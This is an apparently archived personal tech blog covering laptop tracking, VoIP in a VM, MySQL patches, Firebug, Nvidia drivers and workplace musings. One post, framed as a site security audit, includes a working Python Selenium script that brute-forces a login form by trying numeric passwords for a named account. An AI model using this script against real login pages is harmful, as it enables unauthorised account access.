This blog has moved!

If you are not automatically redirected to the new address, please direct your browser to
http://www.juxtaservices.com/blog/
and update your bookmarks.

Sunday, July 20, 2008

Adeona. "Toto, I don't thinkpad we're in Kansas anymore."

The other day I found a snazzy little software tool for tracking a stolen (or interesting) laptop. I usually don't care much about software anymore unless its open source and in this case it is, so guess what?...I care!

Adeona was written by a few students at the University of Washington, which also happens to be the birthplace of another of my favorite little apps, BitTyrant (incidentally both sponsored by one of the same professors there...Go Arvind!!!). It is a surprisingly simple concept for tracking the previous and current digital whereabouts of a roaming laptop.

Adeona does the usual in reporting IP addresses that have been used to connect to the Internet, but most notable is the fact that it stores all data in the OpenDHT network. Basically, this is a massively distributed online storage system that can be written to over Sun RPC or XML RPC, without the use of a specialize DHT client or an access account. What that means essentially, is that access to the OpenDHT system can be fully anonymous. On top of that, Adeona encrypts all data that is stored inside OpenDHT, so that only the cryptographic credentials provided when setting it up can be used to read the data it stores.

I found the service remarkably simple to setup on my Ubuntu Hoardy install. As mentioned here in the Linux install guide, I just had to untar the source code and compile it. I also had to install the libssl-dev package (OpenSSL development), but this was also indicated in the install procedures. Overall it took less than 5 minutes to get up and running. I then emailed myself a copy of the access credentials and we were off to the races.

I was interested to see what was being reported back by the system and how easy it was to retrieve, so I executed the following command as indicated in the documentation, and here are the results (I have removed my actual external IP. Yea I know the rest are there, but if you really wanted to know where I live, I'd probably tell you if you asked.):

compy:~$ /usr/local/adeona/adeona-retrieve.exe -r /usr/local/adeona/resources/ -l /home/bott/downloads/adeona/results/ -s /usr/local/adeona/adeona-retrievecredentials.ost -n 1
Please enter password for Adeona:
*******************************************************************************
* These results are for informational, research and evaluation purposes only. *
* Do not attempt to recover your lost or stolen laptop yourself. *
* If you believe your laptop has been stolen, contact the appropriate *
* law enforcement agency. *
*******************************************************************************


Searching for most recent 1 update(s) in time period [ 07/18/2008,22:54 (MDT) - NOW ]

Connecting to remote storage server...
Trying server 1...please be patient
Succesfully connected to remote storage server

Checking update scheduled on 07/20/2008,22:39 (MDT)
Succesfully retrieved update replica 0
===============================
Retrieved location information:
update time: 07/20/2008,22:39 (MDT)
internal ip: 192.168.1.105
external ip: *.*.*.*
access point: DAYS_INN
Nearby routers:
1 0.902ms 192.168.1.1 (could not resolve)
2 12.265ms 72.8.117.1 (1.117.8.72.dhcp.mstarmetro.net)
3 12.420ms 72.8.79.241 (241.79.8.72.dhcp.mstarmetro.net)
4 12.701ms 72.8.79.26 (V776-cbr02.vw.mstarmetro.net)
5 12.924ms 192.41.84.241 (pub-192-41-84-241.center7.com)
6 13.191ms 63.226.73.73 (slc-edge-10.inet.qwest.net)
7 25.332ms 67.14.32.202 (snj-core-02.inet.qwest.net)
8 25.964ms 205.171.214.46 (sjp-brdr-02.inet.qwest.net)
9 26.452ms 213.248.87.49 (sjo-bb1-link.telia.net)
10 87.022ms 80.91.248.189 (ash-bb1-link.telia.net)
11 163.948ms 213.248.65.209 (ldn-bb2-pos6-0-0.telia.net)
12 177.269ms 80.91.250.148 (hbg-bb1-link.telia.net)
13 200.930ms 80.91.250.133 (bpt-b2-link.telia.net)
14 200.401ms 213.248.79.2 (dante-ic-121273-bpt-b2.c.telia.net)
15 201.348ms 195.111.97.242 (c6513-tengbeth13-3.vh.hbone.hu)
16 202.461ms 195.111.97.102 (sup720-tengbeth2-1.bme.hbone.hu)
17 203.195ms 152.66.0.125 (tge8-1.taz.bme.hu)
18 193.745ms 152.66.0.122 (vlan13.ixion.bme.hu)


===============================
What I did find interesting about the results was the DAYS_INN access point registering in the system. I rarely use my wireless and I guess the last time I did was at a Days Inn a couple months ago when I was out of town for a wedding. Although, to be honest, as much family as we have had over this summer, its kinda starting to feel like one around here too... At any rate, I give Adeona a double thumbs up. Definitely one of the cooler utils I've seen in a while. Although it occurred to me just now that as secure as my password is, the dumbest of criminals may never find their way online with it anyhow. Oh well.

Labels: , , ,

Friday, June 27, 2008

MagicJackin' a VM



So we all know how giddy I get over bargains (if not, consider this a news flash), and I found a great one the other day. The father of a buddy of mine whom I was chatting with the other day, told me about this snazzy new VOIP service called MagicJack. Basically IT is USB VOIP adapter that cost me ~$50 for a year's worth of service that included the device and free unlimited calling anywhere in the US and Canda (right now the price for an additional year is $20, but I've learned not to buy ahead on service with startup VOIPs). Awesome deal, right?! That's what I said too. I mean I am paying almost $20 a month for my current VOIP line at home. The only question for a tuxraider like me was...how hard would it be to get it working in Linux (I was confident there would be a way to do so)?

Well, after a little bit of probing I discovered that there was no native Linux version of the software...bummer. But I have had to run a Windows VM for a while now so that I could handle a few odd Windows only tasks, so I figured it would be easy to just throw that puppy onto the VM and be off to the races. 'Twas not to be so easy.

I soon discovered that out of the box, VMWare Server does not have entirely stellar USB service when run inside Linux. It is fine for sharing a USB disk, but the MagicJack was fightin' back. So I began to poke around and finally figured out how to get it working inside of a Windows VM on Linux.

Here is my setup:
- Ubuntu 8.04 Hardy Heron Host OS (Should work on any Linux distro just the same)
- VMWareServer 1.0.6 build-91891
- Windows XP VM Guest OS
- MagicJack USB device

The real key to getting this to work was to make sure that the USB device could be shared by the VM and the host machine. Out of the box, my Windows VM could detect it, but it was not able to fully function. Here is what I added to /etc/fstab on the host machine to make it work:

# USB for vmware/vbox
none /proc/bus/usb usbfs devgid=46,devmode=664 0 0


If you are still having problems getting the MagickJack to work on a Windows VM in Ubuntu, I recommend setting the networking on the VM to bridged first and then once it is working set it to NAT.

Now, since I'm the only one who has called my number, I just need someone else to call me up to make it a bargain worth its salt.

Labels: ,

Yo, Yo, Yo

Yo, yo, yo catz. Man it has been a long time since I have blogged here. Basically I think it comes down to one word: "thesis". It is done! In fact that is pretty much old newz these days. I finished it up in December before Christmas, but basically, I haven't felt like composing since then. That, and I've been pretty busy with things at the now not so new job. Anyways just in case you are in the mood for some heavy reading, here is the linky.

Labels: , ,

Friday, November 09, 2007

iPhone, uPhone, wwwe all Phone



Well truth is, I don't have an iPhone, but I have friends that do. Yay for me! I happen to have a certain ongoing 4.5 year vendetta/boycott against AT&T for a long string of indifferent offenses against me long ago. I know it sounds like a family feud or something, but if I've ever told you why I will never shop for food at Kneaders, you will understand because its along the same lines. And on top of that, I currently have Verizon, which does not allow SIM card phones on its network, so that rules out the option of hacking an iPhone.

Anyways, yesterday, an iPhone totin' friend of mine came to me with an intriguing question. He happened to have an HTML document that he wanted to view on his iPhone, except for the fact that it was unfortunately sized such that it was very inconvenient to navigate through the iPhone browser. He wanted to be able to access it without a connection to the internet, so he had installed Apache onto his iPhone to be able to serve up the HTML document locally, however there still remained the issue of having to painfully resize each page of the document when viewing it. He had stooped so low that he finally came to me.

My first thought was to utilize some kind of global CSS, but after digging into it, I realized there is no way to do that without having to include the CSS in each file of the document. Not a very sexy solution. As I continued to think about it though, I realized that there must be some way to view the pages through an iframe in a new index page and if necessary, resize the contents of the frame using JavaScript to suit the iPhone medium. My friend had informed me that there was some meta data that could be used to tell the iPhone to resize the contents of a page. So, here's what I came up with (with some tweaks he made once it was on his iPhone).

<span style="font-size:100%;"><html><head>
<title>Standard Works</title>
</head><body>
<meta name="viewport" content="width=320; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;">
<iframe name="iframeName" id="iframeName" src="realindex.html" marginwidth="0" marginheight="0" style="width: 310px;">
</body></span>

It worked like a charm! Chalk another one up for the nerds. This could even be further enhanced to allow it to be dynamically passed a page to prevent sizing issues in any page being browsed. I'll let someone who actually has an iPhone tackle that.

Sunday, October 28, 2007

MyGeeQL

As a young ambitious coder way back in the day, my very first dynamic web page was written in really awkward PHP with MySQL version point something as the back end persistence. I should really try and dig up that code just for old time's sake. I'm sure its still on a 3.5" "floppy" (they can hold thousands of pages of text...ok, maybe just hundreds) somewhere in my basement. Those were dark days.

Well MySQL has come a long way since then, and I'd be lying if it said its not my defacto now for web development. In fact, I never had any real complaints about it. By the time I was using it for more enterprise level systems, it had caught up in most ways. With the latest major release, MySQL 5.0, glorious enhancements like stored procedures, triggers, views, and transactions were introduced, creating more serious competition for larger commercial vendors. Well I couldn't be more pleased with using it as the back end for an advanced web application. That was, until I found out about google-mysql-tools.

After reading an article the other day that describes a recent announcement that Google will be contributing some of its custom enhancements to the main MySQL code base, I discovered they have already released some fairly slick improvements for utilizing MySQL in a highly available, distributed environment. Since Google is considered by many to be the largest single user of MySQL, and they have successfully solved some rather difficult real-time web issues through their software, I figured this was well worth looking at.

Released as a patch that can be applied to MySQL4 or MySQL5, google-mysql-tools is aptly hosted on the Google Code website, and it offers some really slick enhancements to MySQL run in Linux using the InnoDB table structure. Some of these include partially synchronous replication between master and slave hosts, mirrored binlogs, replication of transactions, asynchronous background IO threads in InnoDB, and the monitoring of database activity on a per user, per table basis. I will definitely be applying this patch in my next MySQL5 install.

Monday, July 02, 2007

The Other Bungee


Its hard to deny the impact of Bungie on the lives of technies and teenagers everywhere. The makers of one of the best selling video game series in history have all but defined the first person shooter on the XBOX. Bungie Studios, the makers of the Halo series know how to do it right. But look out, there's a new kid in town. Bungee Labs (which by the way is not affiliated with Bungee Studios). And we're talking about something a lot cooler than video games. I know, its hard to fathom such a thing, but true it is.

I first heard about Bungee Labs through a previous co-worker of mine who is now employed there as a quality assurance engineer. He has been telling me how impressive their service is, and the other day he invited me over to see a product demo. Their flagship product bundle Bungee Connect, which debuted at the recent Web 2.0 conference, provides an entirely browser based IDE and development environment for quickly and efficiently creating web based applications. One of its most impressive features is the ability to automatically import any SOAP or REST web service and utilize its full functionality with a few clicks of the mouse. During the demo, in about 5 minutes, the presenter imported the recently announced eBay shopping API (it was unveiled at eBay live about a month ago), and created a custom implementation of it that provided a search for products and subsequently displayed the images, product descriptions, pricing, etc. for the resulting products.

The most impressive part of demo however, was the fact that the IDE (called Bungee Builder) is built using Bungee Connect. As the demo went on I almost forgot it was running inside of a browser because it functions like a full featured client side application. Bungee promises cross-browser compatibility for Builder and all applications it creates in Firefox, IE, and Safari. Another very innovation part of the Bungee service is the actual business model itself. Use of builder and the application development and deployment cycle is completely free, with charges only occurring according to the amount of site usage.

The service is currently in Beta, so there are certainly more changes to come, but I have to say as a web developer, this is a very exciting piece of technology, and one which I look forward to utilizing.

Sunday, June 10, 2007

Favicon.ico 404 Errors

Upon recently perusing the Apache error/access logs within my sys admin dominion I discovered a massive number of 404 errors occurring. This was evidenced by the accessing of a custom 404 page which is redirected to by another default script if what is requested is not found. Since this page was the result of a redirect, in order to determine what URL was causing it, it was necessary to scan the access log to see what had been requested by the same IP just before the 404 page was accessed, thereby indicating what resource was being requested that was triggering the 404 script. After briefly reviewing the access log, it became evident that the culprit was a request for favicon.ico in the root web folder.

Favicon.ico is the default means of displaying a custom icon in the URL bar of most modern web browsers. Most commercial websites populate this image with their corporate logo for further site recognition and customization. If you go to http://www.blogger.com, you will notice that the favicon is the orange blogger "B". Well, apparently most web browser will look for favicon.ico in the root of the web folder of the site being accessed. Because of the custom 404 scheme of the site in question, the lack of this file in said location was causing a 404 to occur. Upon doing a bit of digging, it was discovered that while there was a favicon being used, it was displayed using an alternate JavaScript method (probably for better cross-browser compatibility), and that indeed no favicon.ico file existed in the document root. This was remedied by creating a symlink in the root to the location where the JavaScript solution was pulling the favicon from. This seems to have removed these 404 errors, causing the remaining errors to be more discernible and hopefully easier to address.

Tuesday, May 08, 2007

Dump stderr to stdout

I recently discovered the solution to a previously baffling problem I was having with the code deployment tool I have been writing as part of my thesis research. By the way, Doba has graciously allowed me to open source the entire project. You can find it here.

Since the project relies on the execution of SVN commands through the use of the exec() function in PHP to perform actions dictated through the web interface, there are alot of exec() calls made in the performance of duty. The output of these commands is generally captured so that it can be displayed back to the user and logged into the system. I was previously baffled however, why sometimes when an SVN error occurred, that it was not returned as output for the function call, but would instead be written to the Apache error log. That was until, upon discussing the issue with a coworker that we stumbled upon the reason. The SVN client was writing the error to stderr instead of stdout! Hello!

In order to solve the error therefore, and thereby prevent myself from having to mow through a bunch of error logs when something failed, I simply had to make sure and pipe stderr to stdout for any svn commands being executed. Here's what I appended to the end of the command to make it happen:

svncommand 2>&1

Since all of the SVN commands are executed through a central function, adding this pipe for all commands was a cinch. Now any and all errors encountered are properly displayed with the SVN output.

The Flaming Cockroach

No, it's not some south of the border concoction having to do with Tequila. It does however have to do with debugging in Firefox. In fact, Firebug may be my most favorite Firefox plugin ever. It makes previously tedious web/bowser debugging a cinch. Instead of a massive number of echo() or var_dump() calls, the current contents of any web page element can be easily inspected, including any and all JavaScript and CSS elements. I have found this tool to be invaluable when debugging AJAX calls since it handily displays all AJAX request results.

In addition to the integrated inspector, Firebug also allows the live alteration and debugging of HTML, CSS, and JavaScript. There is also a graphical means of displaying the alignment of CSS elements to help show you how things are aligned, as well as the ability to profile page functionality and the time it takes various components of the page to function. One of Firebug's most helpful pieces of functionality for DHTML and JavaScript rich web applications, is the ability to inspect and edit the DOM, which can be difficult to debug manually.

If you do any significant amount of web development and its not already in your development arsenal, Firebug is really something you should not be without.

Monday, May 07, 2007

Google Codeage

Recently I went poking around in the "Google extras" section and found some nifty new tools and open source code snippets. Below are some of the highlights:

Send to phone (http://www.google.com/tools/firefox/sendtophone/index.html)
This snazzy Firefox plugin allows you to highlight text to a webpage and then send it via text message to any mobile number. Pretty slick way of sending free text messages to your friends since once you select text, you can edit the message before its sent.

Picasa (http://picasa.google.com/linux/)
This is an older piece of open source Google software, that provides an excellent app for photo management and simple editing. If you haven't ever checked it out, it is really worth it. There is even a Linux version!

Google Maps (http://maps.google.com/maps)
If you're still using Mapquest you are living in the stone ages. Google maps utilizes an AJAX interface to allow real-time scrolling on the map. I've never tried to scroll all the way around the world, but I have a feeling it would work!

Kongolo (http://code.google.com/p/google-kongulo/)
This neat little plugin for Google Desktop allows you to spider and index a specific URL, thereby making it searchable by Google Desktop. It is optimized to allow speedy re-indexing of the site by only handling changes since the last index.

Real Time Syntax Highlighting JavaScript (http://code.google.com/p/rtshjs/)
This is one of the slickest pieces of code I found on the site. It is a piece of JavaScript that will automatically highlight code syntax in an HTML page, based on the programming language used. It will end up looking like the code would appear in an IDE like Eclipse, making it really slick for web pages that embed code snippets.

In compliment to these handy projects and open source code components, there are constantly newly emerging projects that can be tracked on one of the many related Google blogs. A few of my favorites are:

Google Code Blog
Google Web Toolkit Blog
Google Testing Blog (This one is really good!)

Tuesday, April 17, 2007

Securing the World One Way or Another - Penetration Testing Using Selenium


Security is a big area of interest for me as techie. There's just nothing like the feeling you get by crafting some clever mechanism to bypass someone's (usually poor) attempts at security, or the exhilaration of successfully tweaking something to make it work other than the way it was intended. On the flip side, it is really a pretty crappy feeling when something has been hacked and you are the one who has to figure out how and create a damage report. I would much rather see things secured from the get-go.

That said, I wanted to share a new tool that I discovered and implemented the other day to do some brute force penetration testing on a website that I was auditing. It is actually a tool used to automate UI testing of web based applications, and was shown to me by a QA buddy of mine. It's called Selenium and is a piece of open-source software built in Java.

There are actually several components to the selenium package that make it a really great automated testing suite. The first of these is called Selenium IDE, and it runs as a firefox plugin allowing you to record and edit selenium test scripts. This is really slick for creating quick and dirty web app tests. There is also another tool called Selenium RC which is what I ended up using for my penetration testing. From the about page: "Selenium Remote Control is a test tool that allows you to write automated web application UI tests in any programming language against any HTTP website using any mainstream JavaScript-enabled browser." That pretty much sums up this glorious piece of software.

To run it, you just fire up the java server process, and then run a test script written one of a number of common scripting languages (that utilizes one of the corresponding selenium interface objects for that language) and the script will fire up a browser and run your tests on the target URL. Languages with current support include Java, .NET, Perl, PHP, Python, and Ruby. There is even support for SSL sites through the clever use of some proxy techniques.

The script I used for my testing was written in python and basically just accessed the target login page, iterating through a list of passwords until it found one that logged in successfully. Since security was very minimal, it didn't take long to succeed. The script itself was very simple as well as you can see:


from selenium import selenium
import unittest, os, time

class Cracker(unittest.TestCase):
def setUp(self):
self.selenium = selenium("localhost", 4444, "*firefox /usr/lib/firefox/firefox-bin", "http://www.targeturl.com")
self.selenium.start()

def test_new(self):
sel = self.selenium

user="bryce@targeturl.com"

for i in range(100, 999):
sel.open("/login.aspx")
sel.type("username", user)
sel.type("password", i)
sel.click("Button1")
sel.wait_for_page_to_load("30000")

#time.sleep(1)

if sel.is_text_present("Your login credentials were not correct. Please try again"):
print "Failed, trying password: " + str(i)
else:
print "Success, your password is: " + str(i)
break


def tearDown(self):
self.selenium.stop()

if __name__ == "__main__":
unittest.main()


The password domain in this case was fairly small (100-999), but this script could easily be altered to read in a dictionary file or a programmatic list of brute force passwords. With the Selenium RC server process running, all I had to do was fire off the python script (python hackscript.py) and away it ran.

The server can be a little tricky to get running, but I found the instructions in the Tutorial and Troubleshooting Guide to solve any problems I encountered. (If you are running in Linux and you have to update your firefox-bin path, don't forget to reload the PATH variable using 'source ~/.bash_profile). If you would like to run the latest version (this may be necessary if you are using Firefox higher than 2.0) you can find the server.jar file here. Just replace it in the unzipped structure and you should be set.

Tuesday, March 27, 2007

Ladies and Gentlemen, What You've All Been Waiting For...The Chumby

If you haven't figured it out yet, I'm have several technical interests. Two of these are security and hacking. Interestingly, the word "hacking" has inherited several definitions in addition to the most commonly known one used to refer to the nefarious and often illegal intrusion of secured computer systems. In a general sense it is basically a creative or ingenious way of modifying something to be used different that what was intended. There's tunnel hacking, life hacking, and of course technology hacking. This creative way of looking at new solutions to problems, even exploiting and enhancing a current solution is more of what I mean when I say that hacking interests me. In particular, I find hardware hacking to be a fascinating subject.

That is exactly why I was so excited about a year or so ago (maybe longer, who knows) when I heard about the Chumby. Its a hardware hacker's dream. Who in the world of personal digital devices is not sick of DRM and other proprietary limitations placed on them through their devices? Chumby is entirely open source which is what makes it so exciting. And not just the software it runs either. In a completely unprecedented move in modern consumer electronics, Chumby Corp has even released the hardware schematics for the device, allowing anyone with the will to improve, enhance, and expand its functionality.

The device contains a 266 MHz ARM processor, 32 MB SDRAM, a 3.5" touch LCD, wireless, and several sensors, runs on Linux, and has been designed to run flash widgets, play mp3's and accomplish several other interesting tasks. Check out their website, which has links to the Chumby forums and wiki, for more info.

International Nerdery


It's official. I'm international. A quick look today at my Google Analytics page told me so. I have a whole slew of visitors from Europe who have checked out several of my Ubuntu posts among other things. Now I'm just waiting to break into the asian market.

If you've never used Google Analytics before you are missing out on one the best free webmaster tools on the net. Check it out at http://www.google.com/analytics/. In order to use it, all you have to do is insert some JavaScript into your site which helps catalog information about traffic to the site. Provided with the tool is a full site statistics suite that includes reporting on referrers, number of hits, repeat visitors and even geographic locations, to only mention a few.

So, according to analytics at bitshifting.blogspot.com, I am alot more popular than I thought. Inspired by my newly discovered popularity, I have resolved to post more often. That said, the one thing that Google Analytics doesn't really tell me, is what people that visit bitshifting want to see more of. So here's you chance to give me suggestions on what you'd like to see me blog about. Maybe its more of what I spend my free time doing. Maybe its more of what I spend my professional time doing. Maybe you're got a technology related problem. Just post a comment with any feedback or suggestions you may have and I'll work on getting you a response. Here's to all those lonely asian nerds who don't know what they're missing. Yet.

Saturday, March 10, 2007

The Myth of the Nazarene Welder


It's been a while since I've posted. What percentage of my posts start out like that? It must be close to a hundred percent, at least in my mind before I start typing. Well, its March already, so too late to make that a new year's resolution. Maybe I can make it a part of spring fever. We'll see what happens. On to the task at hand however.

Prepare yourself, because I'm about to enter the realm of pointy haired thought and discuss something a manager would talk about. I know this isn't my normal geeky train of thought, but I thinks its worth visiting from time to time. I've had this idea for some time now about the assignment of tasks and how it relates to what I like to call the Myth of the Nazarene Welder.

Whether or not you agree in principle with the religious affiliation, you are most likely at least familiar with the vocational endeavors of the most renowned personage from Nazareth. In case you are not, I'll give it to you straight. Jesus was a carpenter. We'll now set aside all further mention of religious figures and talk about carpentry.

When I was growing up, there was a period of several years when my father, who is a petroleum geologist, used to make yearly trips to Singapore and Malaysia for business. He would return with some fabulous local souvenirs and art pieces, which included some amazingly intricate carvings in some exotic species of hardwood. I remember thinking how much skill and time those must have taken to create. Similarly, I recently attended a display at the local university's art museum by a local artist, Andrew Smith, and his father called "Poetic Kinetics", which was a fascinatingly elaborate display of mechanical pieces that basically consisted of a bunch of scrap metal cleverly welded into moving sculptures. Both of these works demanded my artistic fascinations. Imagine for a moment however, that these two artists were to swap mediums. I'm sure to some extent the results would be similar in their level of detail and artistic nature, but I imagine that neither would have found its way onto my mother's mantel or the floor of a prestigious art museum.

What is the moral of this story then? Let people do what they are good at. It seems to be fairly popular in alot of organizations to try and "let people experience different things" and "increase their skillset" or "become familiar with other parts of the system", which I am certainly not against, but too often I think it is taken to far. It's too much like asking a welder to build a set of stairs. Out of wood. He'll always be one step behind. Like a welder building a set of stairs.

Let me provide an example of this myth in action. Let's say your company has several developers, all hired as either UI developers or back end programmers, but now you have a real need for a Database Administrator. Instead of trying to take one of your current welders and have them perform DB carpentry, you should just go out and hire a DBA! People generally end up in careers that they have chosen and enjoy, and trying to get them to do other things generally results in alot of spinning wheels and usually subpar results. While this often seems like a cheaper alternative, that's part of the myth. In the long run carpenters can't be good welders, and they will either just quit trying or turn out shoddy work indefinitely.

Here's another, not so obvious example. Let's say you have two groups of developers. One group has just completed a system for tacking customer orders within the company. The other, an API used by advanced customers to integrate their websites with your company's. Management decides that parties from both sides need to be familiar with the systems from the other (this is particularly common when the groups involved are single developers) because they are worried about what will happen to the application's knowledge base if one or more developers leaves the company. To effect a transfer of knowledge between the two sides, they decide that incoming defects will be fixed by the opposite party. What's the result?

Well, if the systems are not very complicated (haha that's a hilarious thought!), the new project owners will quickly learn the ins and outs of the system and then everyone will know everything about the entire codebase. That's another part of the myth. The whole reason management worries about losing people is because the systems are sufficiently complicated that doing so would cause alot of downtime to get someone else up to speed. While alot of management's job is to hedge its bets and cover all the bases in the event of disaster, too often in this situation, the drawbacks of this approach are ignored.

The first consequence of living the welding carpenter myth is that there is an immediate loss of productivity as people try to get familiar with their new assignments. Instead of taking the code's original author 15 minutes to find and fix the defect, it takes the new owner 2 hours to fix it, including an hour of time they spend bothering the author with questions about the system and possible reasons for the defect. Consequently, there is also an opportunity cost involved. The more time the new owner spends on the new system, the less they will remember about the system they authored, so in this case there is a double double wammy of productivity loss.

Another issue with this myth is that the real reasoning behind it is to try and prevent knowledge loss if personnel leaves the company. This is certainly inevitable to some extent, but there is an awfully high price being paid to try and mitigate that risk. Is it worth it? I guess it depends on the company's effectiveness at initiating attrition. Certainly they will be better at that if they try and push people to do things that frustrate them or fall outside their skillset (like throwing them into a new foreign code base or project every 6 months).

What then should be done to prevent this perversion of vocational assignment? Instead of trying to hedge the bets of attrition through reassignment that results in double sided inefficiencies, It would be much more efficient to focus all those efforts on a rigorous policy of documentation that prevents knowledge loss as development proceeds. I won't go into detail in this post on my thoughts of how to best incite documentation (I will say that wikis are amazingly effective), but having policies in place that ensure proper systems documentation should tide the knowledge base over until other employees can come up to speed on the insights that were lost by an employee leaving. The second amazingly affective thing that can also be done, is to work harder at not losing employees! No, really. Try it. Better compensation, benefits, or even something as simple as newer hardware, a company game room, or a popcorn machine will go along way towards keeping people around.

Wednesday, January 31, 2007

Nvidia Kernel Upgrade Woes



I've spent the last several hours of rather frustrating personal computing time trying to get my Nvidia driver up and running again after doing an apt upgrade that included a new kernel. At first there was just not a version of 'nvidia-glx' linked into the newest kernel package (this was the method I originally used to install the driver), and so I went back to using the crappy 'vesa' driver for a week or so, hoping they would fix the linkage issue. That they did, but I soon discovered that this new version of the driver was incompatible with my graphics card, an apparently now outdated Nvidia 440 Go.

So began my epic journey to install the archived version of my beloved driver. I started out going to the nvidia site http://www.nvidia.com/object/unix.html and downloading the Linux AMD64 driver version 1.0-9631. After checking out the documentation, it all seemed pretty straight forward. That sounds pretty hilarious now. Like I said, the next few hours were spent trying to get it working. At one point I had it installing, but the module would not properly reload upon a reboot, so if I was all set if I wanted to reinstall the driver every time I booted. No thanks.

To make a long story short, I finally found a solution. It appears that the default modules and junk that were installed mostly with 'linux-restricted-modules' were preventing the new module from being properly linked. Here's the enlightening site that provided my blessed solution, http://doc.gwos.org/index.php/BerylOnEdgy

The steps I used are as follows:
1. 'sudo nano /etc/modules'. Add the 'nvidia' module to the list.
2. 'sudo nano /etc/default/linux-restricted-modules-common'. Make sure the file looks like: 'DISABLED_MODULES="nv"
3. Press 'ctrl-alt-F2' to open a new terminal, and enter the following:
sudo apt-get install linux-headers-`uname -r` build-essential gcc gcc-3.4 xserver-xorg-dev
sudo apt-get --purge remove nvidia-glx nvidia-settings nvidia-kernel-common
sudo rm /etc/init.d/nvidia-*
sudo /etc/init.d/gdm stop
sudo sh NVIDIA-Linux-x86-1.0-9631-pkg2.run
sudo nvidia-xconfig --add-argb-glx-visuals
sudo /etc/init.d/gdm start

3. Reboot the computer and it should come up.

It has been stated that this process must be repeated each time the kernel is update, which isn't ideal, but now that I've figured out how to do it, shouldn't be as bad next time.

Oh, and as a side note, I'm back to seeing things in German (see my last post), so this post should be Uber impressive.